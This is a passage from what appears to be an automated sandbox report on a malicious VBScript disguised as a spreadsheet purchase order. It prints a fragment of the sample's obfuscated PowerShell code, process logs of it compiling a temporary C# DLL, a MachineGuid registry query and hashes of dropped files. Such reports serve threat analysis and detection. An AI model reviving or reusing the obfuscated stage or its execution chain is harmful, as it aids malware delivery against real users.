TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	755440
Product:	CloudBasic
Start time:	17:57:22
Start date:	28.11.2022
Sample:	PO-09784893 xlsx.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	bfa859d9ad7b23d3606ea13f525065a7
SHA1:	a1b3e395dc20bcdaa866b953a08a48d0079bace2
SHA256:	ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	937C6E940577634844311E349BD4614D	379440E933201CD3E6E6BF9B0E61B7663693195F	30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
C:\Users\user\AppData\Local\Temp\RES41DE.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Nov 29 01:59:57 2022, 1st section name ".debug$S"	5A4E00CCACE5868AAA337F3EBCEC8BC5	D076A269B89250F6A8F7A16140E866D112796096	99989AA5805EB86F0F91D5A1B602F1BBF667672A75313947CFC406B255FCA582
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bujopahg.iyl.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_daxdyhsl.wnc.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP	MSVC .res	C61B5BAAD76D0DD77CF4A2E8243A1413	CFC6184E06A84CE1252FA7E6C1C7F8E210889947	74B5220AC3B0ABFEB55A34615BB7A17651B0BC6B717FFF5A6312C315A88C11FE
C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.0.cs	Unicode text, UTF-8 (with BOM) text, with very long lines (1330), with no line terminators	5275A510067D1ABB9D22D3925B1C219F	41B1A3E7A0EE598898BFDC2E5BFDF6A2D34E6D64	F44938B9BA94A2465515FD9EA6D319016294EAFA6EDC89A5D2E736195C3FA649
C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline	Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators	599EE5EEF75ACB851BF5E4A996A41B67	703DCEB87B4233C99D76D4688223717FD8D1A881	ED2F6701C64A817806D8556C8D007D28CAF91F01B3A854DDAC1425327B01C002
C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	60B2FEFC99117C746AFAC55504B79E2C	32A59A55514E4F4E0608C6993F13D1EF455CA951	725FA9A114EC1E33F22D2FFAB250A6F8D42021C497906481C0A45B7A3D6F3834
C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.out	Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators	2DA554008CD82D16927849B91ECB7DF2	D352F0441621E0FFBF6E83D0463449DD17C60D12	D386A8DD9B8D57B2221AAB1ADEF86C66A3B8508C63E0322C06EA4DCA0C3B829E

Windows Analysis Report
PO-09784893 xlsx.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Windows Analysis Report PO-09784893 xlsx.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Windows Analysis Report
PO-09784893 xlsx.vbs